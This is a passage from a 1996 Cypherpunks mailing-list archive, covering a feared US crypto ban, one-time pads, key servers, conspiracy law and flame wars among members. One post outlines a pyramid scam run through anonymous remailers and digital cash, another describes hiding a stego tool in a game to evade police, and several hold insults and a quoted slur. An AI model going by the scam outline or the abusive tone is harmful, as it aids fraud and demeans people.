net; for many months Netscape's free software didn't have strong crypto;
Americans even on this list are afraid to publish algorithms and envy
Adam Back's freedom to do so.

My guess about how a crypto ban would go is that it would be an extension
of the export ban, and be based on interstate commerce regulation.
It would ban distribution of crypto software, commercial, freeware,
and shareware, which had the ability to hide the content of messages.
Exceptions would exist along the lines of the recent export proposals,
where the software would be OK to use if it had a small key size with
an approved cipher, or other means to ensure law enforcement access.
The ban might also cover stego and stealth type software, at least if
that were the primary purpose of such programs.  The U.S. would also
work to convince foreign countries to implement similar bans.

One question is whether they would also try to make it illegal to use
(rather than to distribute) crypto software.  On the one hand, if they
don't do that, they have a problem with all the installed base of code.
But the legalities of stopping people from encrypting code on their own
computers, or writing crypto programs for personal use, seem a lot more
questionable to me, and I don't know how much precedent there would be
for that kind of restriction.

So as I see it the main target of the ban would be distributors of
software rather than end users.  This would be in line with the often
stated goal of the law enforcement people that their main concern is with
crypto that is built in, transparent, and trivial to use, rather than
hacker's crypto.

So what are the impacts of this kind of ban?  They might not be all that
bad.  Already on the net Americans have to be careful about what they
say.  We can't describe crypto algorithms because they might leak
overseas.  With a ban on domestic distribution we would still be
prevented from talking about crypto.  So this is not very different.

Commercial companies building in crypto would have to go back to
escrowed or weak encryption.  All those export controlled sites would
treat Americans the same as foreigners and prevent them from getting
the strong crypto.  The few commercial products sold in the stores which
do crypto would have to be changed.  Strong crypto might be distributed
via an underground network, but this would be about as risky as running
Internet sites that export strong crypto is today.   There are very few
such sites, although granted there is little call for them because
overseas crypto sites are widely available.

The end result is that almost nobody in the U.S. would have access to
strong crypto, except for the motivated few who write their own, keep
old strong versions around, or obtain new strong software illegally.
This sounds bad, but as far as actual _users_ of strong encryption it
is not so different from the way things are today.  Weak/escrowed crypto
would still be widely used and built in to communication software.

The big question in my mind is whether they could get away with banning
the use of strong crypto rather than its distribution.  This would be
much more effective from the law enforcement perspective.  But they
have not tried this so far even for international messages, presumably
due to the serious Constitutional questions it would raise.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 11 Nov 1996 07:02:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: FUCK ME HARD
In-Reply-To: <199611110547.XAA15989@manifold.algebra.com>
Message-ID: <a6g9wD27w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Igor Chudov @ home" <ichudov@algebra.com> allegedly writes:

> FUCK NME HARD
       ^^^

Who's "NME"? Let me guess... Another one of Timmy May's nyms? Another forgery?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 11 Nov 1996 07:04:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: GAK?
In-Reply-To: <01BBCF69.4C261320@blv-pm105-ip27.halcyon.com>
Message-ID: <qNH9wD28w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Mark M. Lacey" <mml@halcyon.com> writes:

> Could someone please fill me in on what GAK stands for
> since it seems to be central to some of the on going
> conversations.

It stands for "arbitrary plug-pulling and content-based censorship" as
practiced by Timmy May (fart) and John Gilmore.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 11 Nov 1996 07:03:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Sifting data; looking for "strong crypto"
In-Reply-To: <199611110903.BAA07962@infomatch.com>
Message-ID: <ZPH9wD29w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Murray Hayes" <mhayes@infomatch.com> writes:

> As far as bit patterns go, is executable code random?

No - it's very much not random in the sense that given just a few bytes one
often has a pretty good idea of what the next byte would be.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Mon, 11 Nov 1996 06:52:22 -0800 (PST)
To: cypherpunks <cypherpunks@toad.com>
Subject: Not. [Was Re: Federal Reserve Bank is ILLEGAL?]
In-Reply-To: <Pine.3.89.9611110517.A13588-0100000@skypoint-gw.globelle.com>
Message-ID: <Pine.SUN.3.95.961111094329.3168B-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Instead of reading the rabid nonsense referred to in the previous post in
this thread, try

http://www.law.miami.edu/~froomkin/articles/reinvent.htm

wherein it is revealed that (gasp!) the Federal Reserve is an independent
federal agency, but that (private) federal reserve banks have five of the
twelve votes (the rest belong to government officials) on the Open Market
Committee, an important policy-setting body that has an influence over the
money supply.  Incidentally, this practice was upheld in Melcher v.
Federal Open Mkt. Comm., 644 F. Supp. 510 (D.D.C. 1986). 

My article discusses the tangled legality of letting private parties
exercise goverment powers -- a practice that, like it or not, is as old as
the Republic.  (Documentation for that claim appears at 
http://www.law.miami.edu/~froomkin/articles/reinvent.htm#ENDNOTE9  )
and thus about as clearly within the original intent as anything gets.
Incidentally, the practice of giving private parties partial or full
control over seemingly public functions affects a very large number
of bodies, not just the Open Market Committee.


On Mon, 11 Nov 1996, Doug Renner wrote:

[pointer to rabid nonsense]


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 11 Nov 1996 10:00:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: His and Her Anarchies
In-Reply-To: <9610118477.AA847745509@smtplink.alis.ca>
Message-ID: <v03007802aead19eacee0@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:50 PM -0500 11/11/96, jbugden@smtplink.alis.ca wrote:
>"Timothy C. May" <tcmay@got.net> wrote:
>>Well, I think there clearly _is_ a gender gap on these sorts of issues.
>
>Technologies that matter make daily life less obnoxious, and you can leverage
>them all the time. The Net is going to start mattering in a significant
>way when
>it relieves people of the burden of dealing with the garbage inherent in the
>information flow of everyday life. The net is going to matter when I can
>rely on

Well, in the 23 years I've been on the Net in one way or another, I can
honestly say it is _increased_ my exposure to garbage. The notion that
computers are time-savers is fraught with problems. For some tasks, it
clearly is.

But for other tasks and situations, it's a time sink. I view it primarily
as a communications mechanism, e.g., lists like this, the Web, news, etc.
Your mileage may vary.

Notions that computers will be widely accepted because of their
"time-saving" powers I file right next to claims that computers will be
useful for storing recipes and balancing checkbooks.

--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tom bryce <tjb@acpub.duke.edu>
Date: Mon, 11 Nov 1996 07:13:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Sifting data; looking for "strong crypto"
In-Reply-To: <199611110903.BAA07962@infomatch.com>
Message-ID: <l03010602aeacaaadd636@[152.3.87.2]>
MIME-Version: 1.0
Content-Type: text/plain


>As far as bit patterns go, is executable code random?

No. It's very ordered, actually.

Tom






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@amaonline.com>
Date: Mon, 11 Nov 1996 10:21:15 -0800 (PST)
To: darkened-node@geocities.com
Subject: Re: Hello from the Brotherhood
Message-ID: <199611111821.KAA09943@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: darkened-node@geocities.com, cypherpunks@toad.com
Date: Mon Nov 11 12:20:44 1996
> Hello to everyone from the Brotherhood of Darkness
> 

Oh, joy, just what we need.....

How about if you folks go off and do your thing, and leave us to ours?

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMoapqMVrTvyYOzAZAQFDSQQAoiPhXhSOSJR7nKcCrkiVhue1tIiI2q7n
GLZlR5jaWZGV3ONJikWINt09mZqyaAZjuK3hbPqVNJnICOY8LtPYn0Z39oisxacO
Kq+WHSavMRHstWqUm/sbknQOW24TINqi1NQs0Rn8nMrOTCYYxcugtmiLrSpgTNJa
dt9DMKtOKAk=
=AUie
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 11 Nov 1996 10:17:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: "Please put me off the list"
In-Reply-To: <01BBCF69.4C261320@blv-pm105-ip27.halcyon.com>
Message-ID: <v03007804aead1e6cdde7@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:50 AM +0800 11/12/96, Chang You Shim wrote:
>Please put me off the list
>

OK, you put off the list.

In the event your are asking to be unsubscribed, surely you must know by
now that instructions for doing this are posted on a regular basis.

Alas, those who most need the instructions are the least likely to notice
such instructions, either here or in the orginal sign-on message they
received.

The clueless are doomed to wander cyberspace forever, asking those they
meet to unsusribe them.

--Tim


To subscribe to the Cypherpunks mailing list:

-send a message to: majordomo@toad.com

-body message of: subscribe cypherpunks

To unsubscribe from the Cypherpunks mailing list:

-send a message to: majordomo@toad.com

-body message of: unsubscribe cypherpunks







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@amaonline.com>
Date: Mon, 11 Nov 1996 10:31:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Rarity: Crypto question enclosed
Message-ID: <199611111831.KAA10148@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: mianigand@outlook.net, cypherpunks@toad.com
Date: Mon Nov 11 12:31:25 1996
> > My simple question is regarding key/certificate distribution:
> >
> >         Is there any particular reason that such can't be
> accomplished via
> > on-line lists, and made available via a service on a port, using
> standard
> > (textual) commands, like mail and such are now?
>
> It's possible to have a key-server listen on a port and accept
> requests, then it would
> fork a process, process the result, and return an answer set.
> 
> But how many CPU cycles would it take for a machine to process a
> request, ie going through
> 1000 of keys?  I am not exactly sure, it took a long while on my
> pentium.
> 
> In my opinion, if I were to run a key server as a service, with
> clients connecting and requesting a key
> it shouldn't take more than a minute to get a responce.
> 

Agreed - a proper search algorithm should yield an answer in a few seconds, 
at most.

> >         The things that come to mind are a 'client' request for a
> key, a
> > 'client' submission of a key, an external host requesting a key
> exchange,
> > and the host itself requesting a key exchange with another system
> (only
> > new/changed keys being swapped).
> 
> Had the exact same idea, but came up with an interesting concept. When
> a person submits a key, a PGP process is spawned yeilding the
> following information 1.) The name (peponmc@cris.com) 2.) The real
> name (Michael Peponis) 3.) The key size 4.) Creation date of the key
> 5.) Key finger print
> 
> This information, along with the acutal key would be inserted into a
> SQL Database table
> 
> With a structure similar to this

... <deletia> ...

The reason I brought the idea up here was in the hope that others on the CP 
list could help work out the fussy details of the protocol: what info would 
need to be included for what types of exchanges, what port(s) would be good 
to work with, etc. Platform/implementation would be subject to considerable 
variation - but the idea would survive (hopefully :-)

> 
> It's not that hard, it's performance that's more of an issue.  The
> beauty of my approch would be that initially, there would be alot of
> "Add" requests, resulting in many PGP processes running on the box,
> but eventually, they would tapper off.

Again, implementation on any particular platform using any particular OS 
would be up to the afficionados of said platforms/OS's. I'm more interested 
in the CP list coming up with the protocol/standards.

Dave


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMoasIsVrTvyYOzAZAQEkTAP+JQtMdr5x+Wz4s6SXchgA4ow3+P9WLpzs
JpjXRbNeHspJ2btlAe4pSgRqSp9oygqJ6Nxpa6DFOC4uB6sl3NaOw8tzcVVJm8GN
+QsGP3KBoeTtRh1xE5yUsFoWmGWSqtDLLhu7bU34TaryLBU/Hvj2mOQXqwXhQlvE
FhE5VETJJ2o=
=LG7t
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Mon, 11 Nov 1996 10:32:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <199611111832.KAA10183@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:51 PM 11/7/96 -0800, Peter Hendrickson wrote:
...
>In practice I suspect that good stego is hard.  You don't have to be
>right every time when you look for it, just some of the time.  When
>you see packets that seem kind of funny to you, the judge issues you
>a warrant and you search the suspect's house and computer very carefully.
>If stego is in use, the software that generated it can be found.  Then
>you hand out a life sentence.
...

I have heard of trojan horses as being destructive little programs that are
disguised as some other application.  This is most certainly true.  A
scenario for you.  The police gets that court order and they raid my house.
They confiscate my files.  They look over every piece of software.  Alas,
they find nothing, although there do seem to be some nice games.  Unknown to
them, when I run that little doom type game and come to the first switch, I
press Ctrl, Alt 6 and I get a nice little stego routine that allows me to
copy any file into any other file.  They didn't find it because the program
and associated files run for about 6 Kilobytes, All of the prompts are found
in the game, ("Hint: enter your card key at the food processor for extra
health." print characters 7 - 27), and the game isn't obviously designed for
the manipulation of files, with the exception of those that come with the
game.  This would be a DESTRUCTIVE little trojan horse, even though it
didn't destroy one file.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Mon, 11 Nov 1996 10:32:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: criminalizing crypto use
Message-ID: <199611111832.KAA10190@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:18 AM 11/8/96 -0800, Greg Broiles wrote:
>At 04:43 PM 11/7/96 -0800, Tim May wrote:
>
>>* Intent. It's hard to imagine someone being imprisoned for using
>>cryptography, except perhaps in wartime conditions. I may be wrong. Also,
>>there are deep Constitutional issues we haven't been much discussing.
>
>One change I suspect we'll see sooner or later on the Federal side is an
>amendment of the Sentencing Guidelines to include an upward adjustment for
>the use of encryption to frustrate law enforcement efforts. This wouldn't
>be a conviction for using crypto, but would result in harsher penalties for
>people convicted of other crimes where they happened to use crypto in a way
>connected with the crime. (Keeping child porn or records of a forbidden
>business on an encrypted disk volume, using PGPfone to conspire across long
>distances, etc.)
>
>As an example, less than a year ago, Congress directed the Sentencing
>Commission (a sub-branch of the federal Judiciary) to amend the guidelines
>to enhance the penalties by at least two levels for using a computer to
>advertise or "ship" a visual depiction of child porn. Pub. L. 104-71, Sec.
>2 (12/23/95). 
>
...

I myself have heard of people getting tougher sentences for monitoring
police bands during the commission of a crime.  It seems that using a
scanner while committing a crime is itself a crime, at least around here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Mon, 11 Nov 1996 10:32:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <199611111832.KAA10208@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:02 AM 11/8/96 -0500, Black Unicorn wrote:
...
>You know, I've always wondered, how did the genie get in the bottle in the
>first place.  Someone must have coaxed him in there.
...
Yes, they told him that it was for his own protection and that if he didn't
do it, no one else would either.  They told him that it wasn't nice, but it
was far better than what he would be enduring if he stayed outside.  Upon
being released, however, he had the insight of the confinement.  You can
fool a being once easy enough, everyone has to learn somwhow.  Its much
harder to fool that being a second time, they know better.  Like someone
said, the government has to act now before the people know better.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Tunnicliffe" <Tunny@inference.com>
Date: Mon, 11 Nov 1996 10:36:00 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: FW: Validating a program
Message-ID: <c=US%a=_%p=Inference%l=LANDRU-961111183435Z-2357@landru.novato.inference2.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>  My question is as
>> >follows:  If PGP and DES are as secure as thought to be, then why is it
>> >not ruled illegal software, just as they do with silencers, narcotics,
>> >certain type weapons, etc.....
>
>[snippo]
>
>> Why does it follow that these must be crackable, or the government would
>> have outlawed them? Despite recent moves to limit encryption, there are
>> currently NO domestic (U.S.) restrictions on crypto.  Nothing prohibits
>> you from using a true One Time Pad, which is mathematically proven to be
>> unbreakable, now and forever, even against infinite resources.  If this
>> is not prohibited (and it isn't), doesn't that refute your argument?
>
>Dale Thorn replies:
>This is a misleading challenge.  There's a helluva difference between the OTP
>and a
>Public Key system.  If, for example, it can be proven that I can crank up PGP
>to its
>most cryptic level, and send the OTP overseas with "absolute security", so
>that I
>can now send messages with the OTP which was crunched with PGP's highest
>security,
>then that would mean something.
>
>My point here is that Ed was asserting that PGP, DES, etc., must be
>crackable, otherwise the U.S. government would have ruled them illegal
>(domestically).  I pointed out that one can legally own and use a true OTP
>with impunity in the U.S., despite its unquestioned unbreakability.
>Therefore, his argument falls.  If it made sense, the USG would have AT LEAST
>outlawed OTP's (which they most assuredly cannot break).
>
>Just so there's no misunderstanding:
>
>1. The OTP is absolutely unbreakable. (if done correctly)
>2. The OTP encryption cannot be decoded on the other end unless you can
>deliver the
>   OTP to the person on the other end by a secure means.
>3. PGP, which is not usually used at its highest level of security (for all
>bits in
>   a message), *will* be used at its highest level of security to send the
>OTP to the
>   person on the other end.
>4. The OTP arrives on the other end, completely safe from snooping.
>
>Now you see the problem.  #4 above can't be assured, and that is why Ed says
>that PGP
>is not shut off "right now", because it's probably not "really secure".
>
>I'm not sure what you're claiming here, or what point it is intended to
>demonstrate.  No matter the strength of PGP, delivering a OTP in this fashion
>would render it no longer a OTP.  Besides, this scenario makes no sense.  In
>any case, there is no restriction I know of in sending encrypted data (or
>even One Time Pads) to whomever you choose, by whatever means.  (Granted, if
>you send encrypted traffic to khadafi@libya.gov, or dispatch couriers with
>briefcases handcuffed to their wrists, you might invite suspicion...)
>
>Could you clarify the point you're making above?
>
>I'm amused to think that, in a nation armed with 20,000 or so nukes, the
>paranoid of
>paranoid nation-states as it were, some of the erstwhile intelligent citizens
>think
>that the U.S. military are just sitting around wringing their hands over the
>"fact"
>that the citizens have "unbreakable" crypto.
>
>Bear in mind the Scientific American articles on Public Key crypto back in
>the 1970's.
>The military knew the score back then, and if you think they just sat back
>and allowed
>all this to happen, well, sorry, I don't believe in Santa Claus or the Easter
>Bunny.
>
>Well, while the feds are no doubt powerful, they ARE subject to the same laws
>of mathematics as the rest of us.  While it is _possible_ they know much more
>about factoring than the rest of the world, I find it unlikely that they are
>advanced enough to factor 2000-bit numbers.  (I can't prove it, just as I
>can't prove they don't know how to make their agents invisible.)
>
>And they didn't just sit back and allow this information out -- witness
>Bernstein, et. al., and all the continuing ITAR/GAK fallout.  Of course, I
>expect that some will claim this is just for appearance's sake, so as not to
>make it obvious that they can actually read all our thoughts directly, using
>technology they got from the Greys from Zeta Reticulon...
>
>Tunny
>======================================================================
> James A. Tunnicliffe   | WWWeb: http://www.inference.com/~tunny
> Inference Corporation  | PGP Fingerprint:   CA 23 E2 F3 AC 2D 0C 77
> tunny@Inference.com    |                    36 07 D9 33 3D 32 53 9C
>======================================================================
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 11 Nov 1996 08:02:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Pyramid Schemes
In-Reply-To: <Pine.LNX.3.94.961110211847.1766B-100000@kinch.ark.com>
Message-ID: <iVJ9wD33w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dave Kinchlea <security@kinch.ark.com> writes:

> On Sun, 10 Nov 1996, Dr.Dimitri Vulis KOTM wrote:
> >
> > I think the following would be a worthwhile cypherpunks project: design the
> > anonymous infrastructure to allow those who wants to participate in MMF-like
> > pyramid schemes on the Internet to do so without bothering anyone.
>
> It seems to me that any such scheme is doomed to failure, unless I
> misunderstand what people are talking about here. While I believe that
> there really is a `sucker born every minute', and it is that which makes
> pyramid schemes work, I don't believe that too many people would jump on
> board unless they see real, verifiable names linked with the schemes.

Methinks, you underestimate the stupidity of the average American. :-)

> Isn't it just common sense to say that if people are hiding their identity
> while offering to `make money fast' then there is something seriously
> shady going on? Aren't people *less* likely to join in under such
> circumstances?  Sure, it allows such schemes to work in theory but in
> practice, how do you get people to join in? Who would/how could you
> *trust* such a scheme?

Well - I definitely would not trust such a scheme and wouldn't take part in it.
I suppose if a scheme like this were actually implemented, some people would
be dumb enough to take is seriously and lose some (digital) money; therefore
someone would gain whatever money they've lost, as it happens in all zero-sum
games. However I've been talking about designing a scheme, not implementing it.
If there are students on this mailing list in need of an interesting crypto
project, this is one good idea, IMO.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 11 Nov 1996 08:00:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dr. Vulis
In-Reply-To: <199611110639.WAA22673@mail.pacifier.com>
Message-ID: <gHk9wD34w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> writes:
> surprising and shocking thing about it was that he (Alan Olsen) violated the
> very confidentiality he had insisted on, without any sort of warning, and
> after-the-fact.

Is this anything new? As if you didn't know Alan Olsen, John Gilmore, Jim Ray,
and their ilk are just a bunch of hypocritical dishonest censorous shmucks.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 11 Nov 1996 10:59:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Conspiring to commit voodoo
In-Reply-To: <1.5.4.32.19961111165503.006adfec@pop.pipeline.com>
Message-ID: <v03007807aead26b2cf8c@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:55 AM -0500 11/11/96, John Young wrote:
>   11-11-96. WaPo Page One:
>
>   "Preventing Terrorism: Where to Draw the Line? With
>   Militias, U.S. Adopts Preemptive Strategy"

>      According to legal experts, the mere discussion of a
>      crime, no matter how fanciful it may be, can constitute
>      a criminal conspiracy. "The classic example is that you
>      are guilty of a crime if you conspire with someone else
>      to stick pins in a voodoo doll in the belief that your
>      enemy will fall dead," said Albert Alschuler, a law
>      professor at the University of Chicago.

I don't think I'll be asking this particular expert anything important.
(Charitably, maybe he was quoted out of context.)

Even in this country, with its odd brand of justice, I'd like to see the DA
that will bring charges on "conspiring to commit voodoo," much less the
judge and jury that would eventually convict.

Ham sandwiches notwithstanding, there are powerful limits on what
conspiracy charges are feasible to bring.

(BTW, I doubt even the Cypherpunks members could be plausibly indicted on a
conspiracy charge, even though many of us speak openly of seeking the
overthrow of some or all of the U.S. system. Most of us avoid the key
ingredient of "violent," though those preaching the assassination of public
leaders as a method of overthrowing the system are certainly closer to the
line, and may even be over it. What saves them is that law enforcement, if
they've been made aware of these posts, dismisses them as ravings. This
benign neglect will probably change rather quickly if one of the offshore
betting markets starts carrying odds that a particular judge or other
public figure will be killed. And if he _is_ killed, look for
interrogations of the AP "ringleaders"--and maybe many of the rest of us,
who have spoken out for anarchy and the like--that will make the FBI
interrogations of the nuPrometheus League case pale by comparison.)

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 11 Nov 1996 11:13:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Getting attention the old-fashioned way
Message-ID: <v03007808aead2c1a14b4@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



A second journalist has contacted me for reaction quotes for a story he's
working on about the evolution of the Cypherpunks list, people leaving the
list, and so forth. Presumably Vulis figures in a central way, though this
second journalist did not mention him by name in his short request for
comments.

I sent him a note saying I would not give him such quotes.

Many of you apparently received a letter from another journalist last week
asking for comments for another story, with a mostly-similar theme. There,
Vulis was the obvious focus. (I ignored his letter. The journalist who
mailed me this morning I actually refused with a reply, as he's written
some good pieces in the past. I just won't cater to assisting Vulis in
disrupting the list by giving him more publicity.)

Well, these "stories" prove that a disruptor can get the attention he
craves by shitting all over the list, mailbombing it, referring to list
members as pedophiles and "limp-wristed blonde bitches" (methinks Vulis has
a pretty strong latent fixation, given his constant focus on certain topics
and words).

Sad that journalists cater to this kind of thing. I guess "personality
pieces" are ever so much more popular than technical pieces, or even
careful explications of things like crypto anarchy and the real
implications of the tecnologies we are involved with.

By the way, nothing in this post may be used by any journalist in any
story. Rights are reserved. Readers of this list may read these comments,
but reporters may not quote them. (I'm not sure of the legal status of such
comments, but if they can assert their copyrights for their widely
distributed stuff, why can't I?)

--Tim May




"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 11 Nov 1996 11:39:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: Money-making ideas for Igor Chudov
In-Reply-To: <199611110436.WAA15563@manifold.algebra.com>
Message-ID: <gom9wD35w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


So now we know who's responsible for the "anonymous" spam to this mailing list,
such as the obscene ASCII art and for calling Matt Blaze a "homosexual Jew"...

"Igor 'FUCK MNE HARDER' Chudov @ home" <ichudov@algebra.com> writes:

> manifold::~==>premail -t cypherpunks@toad.com
> Chain: haystack;jam
> Subject: I urgently need a lot of money.
>
> Please share your money-making secrets, I am in a desperate need
> for cash.

A very old scheme, which a lot of Americans still fall for, can be modernized
using anonymous remailers (with a reply block) and anonymous digital cash.

Here's the outline: Igor Chudov posts an article via an anonymous remailer
saying: "Contact this (untraceable) e-mail address to learn how you can make
thousands of digital dollars a week just by sending e-mail." If he distributes
it widely enough, quite a few suckers will send for more information.

Igor will then send each sucker another e-mail giving little information and
requesting, say, $5 in untraceable digital cash for an information packet.

Those suckers who manage to send Igor the $5 get the third e-mail, explaining
how to use the anonymous remailers and untraceable digital cash to sucker
others into paying them $5 for the same information package.

Here's a recent Usenet article describing a similar scheme, using newspaper
ads and snail mail.

]Path: ...!news.rns.net!flint.sentex.net!usenet
]From: msabbagh@sentex.net
]Newsgroups: ab.jobs,atl.jobs,aus.ads.jobs,austin.jobs,az.jobs,ba.jobs,ba.jobs.misc,bc.jobs,bln.jobs,can.jobs,chi.jobs,cmh.jobs,co.jobs,dc.jobs,dfw.jobs,dk.jobs,fl.jobs,il.jobs.misc,in.jobs,kw.jobs,la.jobs,li.jobs,mi.jobs,misc.jobs,misc.jobs.misc,nb.jobs,ne.jobs,ont.jobs,ott.jobs,stl.jobs,su.jobs,tor.jobs,tx.jobs,uk.jobs.d,us.jobs,us.jobs.misc,ut.jobs,za.ads.jobs,alt.jobs,io.jobs,eunet.jobs,b
]Subject: Everybody please  please read this!
]Message-ID: <32828546.724E@sentex.net>
]Date: Thu, 07 Nov 1996 16:56:38 -0800
]References: <3281e88b.115644218@news2.compulink.com>
]Reply-To: msabbagh@sentex.net
]Organization: sentex.net
]Lines: 57
]NNTP-Posting-Host: p7.radium.sentex.ca
]Mime-Version: 1.0
]Content-Type: text/plain; charset=us-ascii
]Content-Transfer-Encoding: 7bit
]
]Homeworkers wrote:
]>
]> Join the over 25,       000,000 people world-wide already working from
]> home.   Free details!
]>
]> In Canada, send self-addressed stamped envelope.   Outside Canada,
]> send name and address plus $2 in US funds for shipping and handling.
]>
]> Mail To:                Work-at-Home
]>                 600 Thornton Road North, Suite 408
